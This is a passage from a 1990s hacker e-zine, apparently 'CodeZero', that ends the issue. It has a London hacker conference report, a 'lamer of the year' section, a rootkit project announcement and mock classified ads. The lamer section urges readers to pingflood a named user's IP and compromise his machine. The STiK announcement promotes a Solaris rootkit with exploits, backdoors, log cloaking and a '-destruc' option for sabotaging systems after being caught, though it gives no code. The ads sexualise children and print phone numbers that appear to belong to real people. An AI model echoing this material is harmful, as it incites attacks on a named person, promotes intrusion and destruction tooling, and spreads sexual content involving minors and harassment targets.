  3120. Emerson was getting really stressed out, as he was one of the staff, and he
  3121. had promised the University that no damage would be done to any of the
  3122. phone / computer lines, he needed a plan to stall us, even though we were
  3123. telling him everything would be fine, and that we would leave all the stuff
  3124. as it was when we found it, he was still scared at the consequences, and
  3125. it was time for lunch, we originally planned to just pop over the street to
  3126. grab a McDonalds, but Emerson started to take us down Regent street, he asked
  3127. if we wanted to eat for around £5 at a place he knew well, we agreed, the time
  3128. was around 1pm...
  3129.  
  3130. Emerson proceeded to take myself, NightRage, the FBI dude, Wyatt and the two
  3131. that had manually wardialled the extensions half way around London, we walked
  3132. down Regent street, onto Tottenham court road and around a load of shops,
  3133. Wyatt and the FBI dude suggested we should grab a beer, and we easily found
  3134. a pub.
  3135.  
  3136. We stopped into the pub and all ordered drinks, we then sat outside and talked
  3137. about the L0phT, global posistioning and scanning, we left the pub at about 2pm
  3138. and made our way through alot of roads and came to Kamamama's Japanese
  3139. restaurant, after stopping into alot of shops on the way and talking about oki
  3140. phones.
  3141.  
  3142. We ate good Japanese food in Kamamama's, and Wyatt used his tiny scanner to
  3143. detect radio comms within the building, his scanner was cool, and he tried to
  3144. pinpoint the frequency that the waiters broadcast the orders with their
  3145. handheld systems, at one point he placed the scanner right up next to the
  3146. handheld and said "can you press that button one more time please".
  3147.  
  3148. Wyatt also had a transciever that he could use to broadcast on, so he could
  3149. pinpoint a frequency with his scanner, and the broadcast with his tiny
  3150. transciever on that frequency.
  3151.  
  3152. The time was now around 3pm, and we made our way back through a very busy
  3153. London to the conference, when we got back we went back up to the network
  3154. room, not alot had happened since we had been away (much as Emerson would
  3155. have expected) and myself and NightRage toyed with systems for about 30 minutes
  3156.  
  3157. We then listened to another talk by a journalist who often writes of hacking
  3158. and computer security issues, called Dave Green (I think), Cold-Fire and the
  3159. people on the balcony often questioned him, and he generally said "no-one
  3160. cares what you do, so why should I write about it?" which was pretty true,
  3161. then another journalist went on saying that he would pay for such stories
  3162. if they had reason behind them (ie. web site attacks), this was quite
  3163. interesting.
  3164.  
  3165. The last talk myself and NightRage listened to was Alan Solomon, to which I
  3166. asked, when he was talking about the Linux version of his toolkit...
  3167.  
  3168.   "Yeah, does the Linux version detect Windoze '95 as a virus?"
  3169.  
  3170.   He didn't understand, but he's cl00less and hangs on AOL all day...
  3171.  
  3172. He then went on to talk a load of crap about how amazing AOL was, then he
  3173. talked about how he has been mailbombed and how "phishers" have tried to
  3174. pull all his account inf0z (passwords etc.) he was also shouting into the
  3175. microphone, and I had a speaker right next to me, and I had my finger in
  3176. one ear for most of the talk, due to the fact that he shouted into the
  3177. microphone, he also breathed very heavily and walked around alot.
  3178.  
  3179. We went back up to the network room, which now had 2 systems and 2 terminals,
  3180. swapped email addresses with Wyatt, Emerson, the FBI dude and a few others,
  3181. we then said our goodbyes, and left to catch the 8:30 train from Paddington
  3182. Station.
  3183.  
  3184. AAA was cool, it was just a pity that only one of the three planned special
  3185. events actually took place, as well as the fact that there really wasn't enough
  3186. time for the people there to talk with each other.
  3187.  
  3188. ───────────────────────────────────────────────────────────────────────────────
  3189.  6. Lamer of the fucking year : pSId (DALnet) : so1o
  3190. ───────────────────────────────────────────────────────────────────────────────
  3191.  
  3192. Theres a fucking cl00less g1mp on DALnet called pSId, but then again, most
  3193. people on DALnet are cl00less, this "cracker" however has the following
  3194. "mad" skills...
  3195.  
  3196.   - phf
  3197.   - tftp
  3198.  
  3199. His most highly acclaimed hack was of sony.co.jp (guess the technique.)
  3200. and since then he has blatently lied about hacking bolero.gsfc.nasa.gov
  3201. (www.nasa.gov alias) which he says runs tftp.
  3202.  
  3203. If you see him *anywhere* feel free to pingflood his IP, 0wn his lame fuck
  3204. Linux box, or anything else.
  3205.  
  3206. ───────────────────────────────────────────────────────────────────────────────
  3207. ===============================================================================
  3208. ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
  3209. ===============================================================================
  3210. ───────────────────────────────────────────────────────────────────────────────
  3211.   1. STiK : mstrhelix
  3212. ───────────────────────────────────────────────────────────────────────────────
  3213.  
  3214.                                   -=STiK=-
  3215.                        (S)olaris (T)ool (i)diot (K)it
  3216.                        ******************************
  3217.  
  3218. STiK is a deluxe rootkit for the solaris platform containing not only
  3219. tools that enable you to gain root access it also allows you to keep it
  3220. with backdoors.  The Alpha version of STiK includes exploits, backdoors,
  3221. sniffers, connection hijackers, a stealth mode, and eventualy will also
  3222. include other kewl tewls such as spoofers, other new inovative remote root
  3223. access backdoors, and maybe if I have enough time a extra option to help
  3224. you construct your own buffer overflow exploits.  STiK supports these
  3225. platforms... sparc10 and sparc20 and it minimaly supports x86 platforms.
  3226. The only conflicts you may have while using this tool is if, (like an (i)diot) 
  3227. you use the -Sun4 switch on a solaris 5.x machine or say the -x86 swtich on 
  3228. a -Sun5 and visa versa... but nobody is that stupid. STiK includes the
  3229. following options....
  3230.  
  3231.         -Sun4, -Sol5, -x86 --> compiles exploits for following platforms.
  3232.  
  3233.         -backdrs           --> installs backdoors and suggests 'em.
  3234.  
  3235.         -stealth           --> does whut it says... and very well.
  3236.  
  3237.         -destruc           --> if you get cauaght online reek some havok
  3238.  
  3239.         -man               --> shows 3r33t manpage
  3240.  
  3241. -Sun4 compiles loits for SunOS 4.x
  3242.  
  3243. -Sol5 compiles loits for Solaris 2.5.x
  3244.  
  3245. -x86  compiles loits for x86 platforms of solaris and sunos
  3246.  
  3247. -backdrs backdoor menu feature,,, pick and choose or mix and match
  3248.  
  3249. -stealth invokes programs such as cloak, zap2, block, and etc...
  3250.  
  3251. -destruc if you get caught and booted this will invoke and fuck some shit
  3252.          up majorly. We dont wanna be destructive but hey !!!YOU FUCKING
  3253.          KICKED ME OFF YER MACHINE ASSHOLE I DIDN'T INVOKE THE -destruc
  3254.          FEATURE R00T DID!!!
  3255.  
  3256. -man     full featured reverse switched manpage to fuck wid yer headz
  3257.  
  3258. If you'z mutha fuxx0rs have any shit you would like me to add so STiK then
  3259. speak now or do without cause I have been hard at work coding shit...
  3260. Also anyone who wants to help port lrk3 backdoors and shit to solaris drop
  3261. me a line cause its a bitch doing it all by yerself...
  3262.  
  3263. edge@mindwerks.com
  3264.  
  3265. ───────────────────────────────────────────────────────────────────────────────
  3266. ===============================================================================
  3267. ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
  3268. ===============================================================================
  3269. ───────────────────────────────────────────────────────────────────────────────
  3270. --------------------------------------+---------------------------------------
  3271.                                       |
  3272.            YOUR SPECIAL AD            |            LET'S BE FREE
  3273.                                       |
  3274.        COULD BE RIGHT HERE #@!        |    Gay White Male 38, 5'11" looking
  3275.                                       |    for men, 12 - 32 clean, fit, and
  3276.        SEND ELECTRONIC MAIL TO:       |    hairy. Discreet Encounters.
  3277.             ADZ@CODEZ.COM             |    Call Anytime : (816)781-8009
  3278.                                       |                   (Ask for Tommy)
  3279.                                       |
  3280. --------------------------------------+---------------------------------------
  3281.                                       |
  3282.         ARE YOU 11 OR 12 ???          |      FREE FONESEX! CALL ME NOW!@
  3283.                                       |
  3284.  Looking for men 11 - 12 for adult    |    Yeah huney, you know you want me,
  3285.  video satisfaction. I am 35 into     |    I'll treat you just right, I'm
  3286.  Professional wrestling.              |    waiting for your call today!
  3287.  Let's talk soon : (816)453-8722      |    CALL ME NOW!@# : (847)546-9154
  3288.                                       |                     (Ask for Kim)
  3289. --------------------------------------+---------------------------------------
  3290. ───────────────────────────────────────────────────────────────────────────────
  3291.                             .oO The CodeZero Oo.
  3292. ───────────────────────────────────────────────────────────────────────────────
  3293.  
  3294.                       _   /|  k0dek4t sez...
  3295.                       \'o O'                            
  3296.                       =(_o_)=   "EyEm HuNGaRy FoR CoDeZ,
  3297.                         U               nOt CaTf00d!!#@"
  3298.  
  3299.  
  3300.               :::  http://insecurity.insecurity.org/codez/ :::
  3301.  
  3302. ───────────────────────────────────────────────────────────────────────────────
  3303.           Remember, McDonalds Owns You, And Ronald Is The KinG!!!
  3304.          Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
  3305. ───────────────────────────────────────────────────────────────────────────────
  3306.